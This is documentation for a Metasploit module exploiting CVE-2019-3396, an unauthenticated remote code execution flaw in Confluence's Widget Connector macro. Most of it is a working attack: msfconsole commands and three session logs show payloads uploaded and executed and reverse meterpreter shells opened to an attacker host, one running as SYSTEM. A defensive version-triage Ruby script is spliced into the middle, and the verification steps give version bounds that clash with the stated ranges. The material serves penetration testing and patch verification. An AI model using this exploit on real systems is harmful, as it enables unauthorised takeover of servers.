# Description
This module exploits a Velocity Template Injection in Atlassian Confluence Widget Connector Macro before 6.14.2 to execute arbitrary code (CVE-2019-3396). No authentication is required to exploit this vulnerability.
The vulnerability exists in the Widget Connector Macro, which allows the "\_template" to be injected from the outside for some services, such as YouTube, Viddler, DailyMotion, etc.
The module has been tested on Atlassian Confluence 6.6.12, 6.8.2, 6.12.0 and 6.13.0 using Java, Windows and Linux meterpreter payloads.
References:

- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-3396
- https://confluence.atlassian.com/doc/confluence-security-advisory-2019-03-20-966660264.html
## Vulnerable Application
Affects Atlassian Confluence before version 6.6.12, from version 6.7.0 before 6.12.3, from version 6.13.0 before 6.13.3 and from version 6.14.0 before 6.14.2.
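
For patch triage, the affected ranges above can be checked against a version inventory. This is an added example, not part of the module or its documentation; the hostnames and versions in `INVENTORY` are constructed sample data, and `fixed_in` and `triage` are hypothetical helper names.

```ruby
require 'rubygems'

# Affected ranges from the "Vulnerable Application" section:
# [first affected version (nil = no lower bound), first fixed version].
AFFECTED_RANGES = [
  [nil,      '6.6.12'],
  ['6.7.0',  '6.12.3'],
  ['6.13.0', '6.13.3'],
  ['6.14.0', '6.14.2']
].map { |lo, hi| [lo && Gem::Version.new(lo), Gem::Version.new(hi)] }.freeze

# Returns the fixed release to upgrade to, or nil if the version is outside
# every affected range. Raises ArgumentError for blank or non-version input.
def fixed_in(version_string)
  s = version_string.to_s.strip
  raise ArgumentError, "not a version: #{version_string.inspect}" if s.empty? || !Gem::Version.correct?(s)

  v = Gem::Version.new(s)
  range = AFFECTED_RANGES.find { |lo, hi| (lo.nil? || v >= lo) && v < hi }
  range && range[1].to_s
end

# Splits an inventory (host => reported version) into hosts to patch,
# hosts outside the affected ranges, and hosts whose version is unusable.
def triage(inventory)
  result = { patch: {}, ok: [], unknown: [] }
  inventory.each do |host, version|
    begin
      fix = fixed_in(version)
      if fix
        result[:patch][host] = fix
      else
        result[:ok] << host
      end
    rescue ArgumentError
      result[:unknown] << host
    end
  end
  result
end

# Constructed inventory; hostnames and versions are sample data.
INVENTORY = {
  'wiki-a.example' => '6.6.11', 'wiki-b.example' => '6.6.12',
  'wiki-c.example' => '6.8.2',  'wiki-d.example' => '6.12.3',
  'wiki-e.example' => '6.13.0', 'wiki-f.example' => '6.14.2',
  'wiki-g.example' => 'unknown'
}.freeze

puts triage(INVENTORY).inspect if __FILE__ == $PROGRAM_NAME
```

Hosts in the `unknown` bucket reported a version that could not be parsed and need a manual check before being treated as patched.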
## Verification Steps
- [ ] Set up a working installation of Atlassian Confluence before 6.6.13, 6.12.3, 6.12.3 or 6.14.2.
- [ ] Start `msfconsole`
- [ ] `use exploit/multi/http/confluence_widget_connector`
- [ ] `set RHOST <IP>`
- [ ] `set RPORT <PORT>`
- [ ] `set SRVHOST <HOST_IP>`
- [ ] `check`
- [ ] You should see `The target is vulnerable`
- [ ] `exploit`
- [ ] You should get a meterpreter session.
## Options
- **TARGETURI**: Path to Atlassian Confluence installation ("/" is the default)
- **TRIGGERURL**: URL of an external video service used to trigger the vulnerability ("https://www.youtube.com/watch?v=kxopViU98Xo" is the default)
## Scenarios
## Tested on Confluence 6.8.2 with Windows target
```
msf > use exploit/multi/http/confluence_widget_connector
msf exploit(multi/http/confluence_widget_connector) > set RHOST target.com
RHOST => target.com
msf exploit(multi/http/confluence_widget_connector) > set RPORT 8090
RPORT => 8090
msf exploit(multi/http/confluence_widget_connector) > set SRVHOST 192.168.0.1
SRVHOST => 192.168.0.1
msf exploit(multi/http/confluence_widget_connector) > set TARGET Windows
TARGET => Windows
msf exploit(multi/http/confluence_widget_connector) > check
[*] target.com:8090 - Starting the FTP server.
[*] target.com:8090 - Started service listener on 192.168.0.1:8021
[+] target.com:8090 - The target is vulnerable.
[*] target.com:8090 - Server stopped.
msf exploit(multi/http/confluence_widget_connector) > exploit
[*] Exploit running as background job 0.
[*] Exploit completed, but no session was created.
[*] Started reverse TCP handler on 192.168.0.1:4444
[*] target.com:8090 - Starting the FTP server.
[*] target.com:8090 - Started service listener on 192.168.0.1:8021
msf exploit(multi/http/confluence_widget_connector) >
[*] target.com:8090 - Target being detected as: Windows 10
[*] target.com:8090 - Attempting to upload C:\PROGRA~1\Atlassian\Confluence\temp\gAdGh.exe
[*] target.com:8090 - Attempting to copy payload to C:\PROGRA~1\Atlassian\Confluence\temp\MRuDb.exe
[*] target.com:8090 - Attempting to execute C:\PROGRA~1\Atlassian\Confluence\temp\MRuDb.exe
[*] Sending stage (179779 bytes) to target.com
[*] Meterpreter session 1 opened (192.168.0.1:4444 -> target.com:62528) at 2019-04-11 03:13:37 +0000
[*] target.com:8090 - Waiting for exploit to complete...
[!] This exploit may require manual cleanup of 'C:\PROGRA~1\Atlassian\Confluence\temp\FFDBo.exe' on the target
[!] This exploit may require manual cleanup of 'C:\PROGRA~1\Atlassian\Confluence\temp\JLzIZ.exe' on the target
[*] target.com:8090 - Server stopped.
msf exploit(multi/http/confluence_widget_connector) > sessions -i 1
[*] Starting interaction with 1...
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > quit
[*] Shutting down Meterpreter...
[*] target.com - Meterpreter session 1 closed. Reason: User exit
msf exploit(multi/http/confluence_widget_connector) >
```
## Tested on Confluence 6.8.2 with Java target
```
msf > use exploit/multi/http/confluence_widget_connector
msf exploit(multi/http/confluence_widget_connector) > set RHOST target.com
RHOST => target.com
msf exploit(multi/http/confluence_widget_connector) > set RPORT 8090
RPORT => 8090
msf exploit(multi/http/confluence_widget_connector) > set SRVHOST 192.168.0.1
SRVHOST => 192.168.0.1
msf exploit(multi/http/confluence_widget_connector) > check
[*] target.com:8090 - Starting the FTP server.
[*] target.com:8090 - Started service listener on 192.168.0.1:8021
[+] target.com:8090 - The target is vulnerable.
[*] target.com:8090 - Server stopped.
msf exploit(multi/http/confluence_widget_connector) > exploit
[*] Exploit running as background job 0.
[*] Exploit completed, but no session was created.
[*] Started reverse TCP handler on 192.168.0.1:4444
[*] target.com:8090 - Starting the FTP server.
[*] target.com:8090 - Started service listener on 192.168.0.1:8021
msf exploit(multi/http/confluence_widget_connector) >
[*] target.com:8090 - Target being detected as: Linux
[*] target.com:8090 - Attempting to upload /opt/atlassian/confluence/temp/EjpPf.jar
[*] target.com:8090 - Attempting to execute /opt/atlassian/confluence/temp/EjpPf.jar
[*] Sending stage (53866 bytes) to target.com
[*] Meterpreter session 1 opened (192.168.0.1:4444 -> target.com:55690) at 2019-04-11 03:13:37 +0000
[+] target.com:8090 -Deleted /opt/atlassian/confluence/temp/EjpPf.jar
[*] target.com:8090 - Waiting for exploit to complete...
[*] target.com:8090 - Server stopped.
msf exploit(multi/http/confluence_widget_connector) > sessions -i 1
[*] Starting interaction with 1...
meterpreter > getuid
Server username: confluence
meterpreter > quit
[*] Shutting down Meterpreter...
[*] target.com - Meterpreter session 1 closed. Reason: User exit
msf exploit(multi/http/confluence_widget_connector) >
```
## Tested on Confluence 6.8.2 with Linux target
```
msf > use exploit/multi/http/confluence_widget_connector
msf exploit(multi/http/confluence_widget_connector) > set RHOST target.com
RHOST => target.com
msf exploit(multi/http/confluence_widget_connector) > set RPORT 8090
RPORT => 8090
msf exploit(multi/http/confluence_widget_connector) > set SRVHOST 192.168.0.1
SRVHOST => 192.168.0.1
msf exploit(multi/http/confluence_widget_connector) > check
[*] target.com:8090 - Starting the FTP server.
[*] target.com:8090 - Started service listener on 192.168.0.1:8021
[+] target.com:8090 - The target is vulnerable.
[*] target.com:8090 - Server stopped.
msf exploit(multi/http/confluence_widget_connector) > exploit
[*] Exploit running as background job 0.
[*] Exploit completed, but no session was created.
[*] Started reverse TCP handler on 192.168.0.1:4444
[*] target.com:8090 - Starting the FTP server.
[*] target.com:8090 - Started service listener on 192.168.0.1:8021
msf exploit(multi/http/confluence_widget_connector) >
[*] target.com:8090 - Target being detected as: Linux
[*] target.com:8090 - Attempting to upload /opt/atlassian/confluence/temp/BYHzD
[*] target.com:8090 - Attempting to copy payload to /opt/atlassian/confluence/temp/dESMnt
[*] target.com:8090 - Attempting to execute /opt/atlassian/confluence/temp/dESMnt
[*] Sending stage (985320 bytes) to target.com
[*] Meterpreter session 1 opened (192.168.0.1:4444 -> target.com:55690) at 2019-04-11 03:13:37 +0000
[+] target.com:8090 - Deleted /opt/atlassian/confluence/temp/BYHzD
[+] target.com:8090 - Deleted /opt/atlassian/confluence/temp/dESMnt
[*] target.com:8090 - Waiting for exploit to complete...
[*] target.com:8090 - Server stopped.
msf exploit(multi/http/confluence_widget_connector) > sessions -i 1
[*] Starting interaction with 1...
meterpreter > getuid
Server username: uid=1001, gid=1001, euid=1001, egid=1001
meterpreter > quit
[*] Shutting down Meterpreter...
[*] target.com - Meterpreter session 1 closed. Reason: User exit
msf exploit(multi/http/confluence_widget_connector) >
```